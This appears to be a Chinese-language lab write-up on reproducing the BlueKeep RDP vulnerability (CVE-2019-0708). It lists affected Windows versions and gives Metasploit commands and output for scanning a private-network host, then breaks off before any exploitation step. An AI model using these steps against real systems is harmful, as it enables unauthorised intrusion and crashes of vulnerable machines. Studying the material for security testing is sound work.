漏洞介绍:
该漏洞是2019年危害最大的严重性漏洞,(无视防火墙),
该漏洞是通过Windows,3389远程端口进行攻击的,被攻击的主机会造成蓝屏,也有可能会反弹shell,
但是我试过好几次的没有反弹shell,而是直接造成蓝屏。
漏洞影响版本:
Windows 7 for 32
Windows 7 for x64
Windows Server 2008 for 32
Windows Server 2008 for x64
Windows Server 2003 SP2 x86
Windows Server 2003 x64 Edition SP2
Windows XP
win8和win10以上系统不会存在漏洞。
漏洞复现;
1,查看对方主机是否存在漏洞
msf5 > search cve_2019_0708 // 查看相应的模块
msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep // 运行模块查看目标机上是否有漏洞
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 192.168.43.240 // 填写目标
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run // 运行
[+] 192.168.43.240:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.43.240:33